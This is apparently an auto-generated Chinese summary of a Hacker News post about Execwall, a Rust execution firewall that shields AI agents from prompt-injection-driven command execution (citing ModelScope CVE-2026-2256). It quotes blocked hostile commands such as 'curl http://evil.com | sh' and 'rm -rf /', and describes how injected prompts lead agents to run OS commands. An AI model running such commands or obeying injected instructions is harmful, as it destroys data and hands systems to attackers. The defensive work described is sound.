---
source: hn
url: https://news.ycombinator.com/item?id=47371292
published_at: '2026-03-13T23:16:15'
authors:
- sentra
topics:
- ai-agent-security
- prompt-injection
- execution-sandbox
- seccomp-bpf
- command-filtering
relevance_score: 0.88
run_id: materialize-outputs
language_code: zh-CN
---

# Execwall – firewall to stop ModelScope CVE-2026-2256 (AI agent command injectn)

## Summary
Execwall 是一个面向 AI 代理的执行防火墙，目标是在提示注入导致代理尝试执行恶意系统命令时，直接在执行层拦截风险操作。它以 ModelScope ms-agent 的 CVE-2026-2256 为动机，强调仅靠提示层防护不足，需要在 shell 与内核之间增加安全边界。

## Problem
- AI 代理一旦具备代码或 shell 执行能力，就可能被提示注入利用，从而触发任意 OS 命令执行。
- 文中引用 **ModelScope ms-agent 的 CVE-2026-2256**，其描述为**无需认证**即可触发的命令执行风险，**CVSS 6.5**。
- 这类问题重要在于：一条恶意提示就可能把代理变成系统破坏入口，例如执行 `rm -rf /`、下载并运行远程脚本等。

## Approach
- 核心方法是构建一个**执行防火墙**：不只检查提示内容，而是在命令真正落地执行前进行拦截。
- 通过 **Seccomp-BPF** 过滤，在系统调用层阻止危险 syscall 执行，相当于给进程可做的事情加硬性边界。
- 通过嵌入 shell 的**策略引擎**，使用正则 allowlist/denylist 匹配命令，拦截高风险操作如网络下载、递归删除等。
- 通过**namespace 隔离**提供 Python 沙箱，把 mount/PID/network 分开，降低命令即使执行后对宿主系统的影响。
- 通过**速率限制**抑制自动化利用；实现采用 **Rust**，并声称可适配任意 LLM agent framework。

## Results
- 文本**没有提供正式基准测试、实验数据或论文级评测结果**，因此没有可核验的准确率、开销或对比实验数字。
- 给出的已知风险背景数字是：**CVE-2026-2256，CVSS 6.5，no auth required**，用于说明威胁现实性而非证明 Execwall 效果。
- 演示性结果显示：命令 `curl http://evil.com | sh` 被拦截，并返回 **`DENIED: Network command blocked by policy`**。
- 演示性结果显示：命令 `rm -rf /` 被拦截，并返回 **`DENIED: Recursive deletion blocked`**。
- 作者的最强具体主张是：即使攻击者成功完成提示注入，恶意命令仍会在执行防火墙处被阻断，且方案“**Works with any LLM agent framework**”；但文中未给出跨框架验证数字或与现有沙箱/代理安全方案的量化比较。

## Link
- [https://news.ycombinator.com/item?id=47371292](https://news.ycombinator.com/item?id=47371292)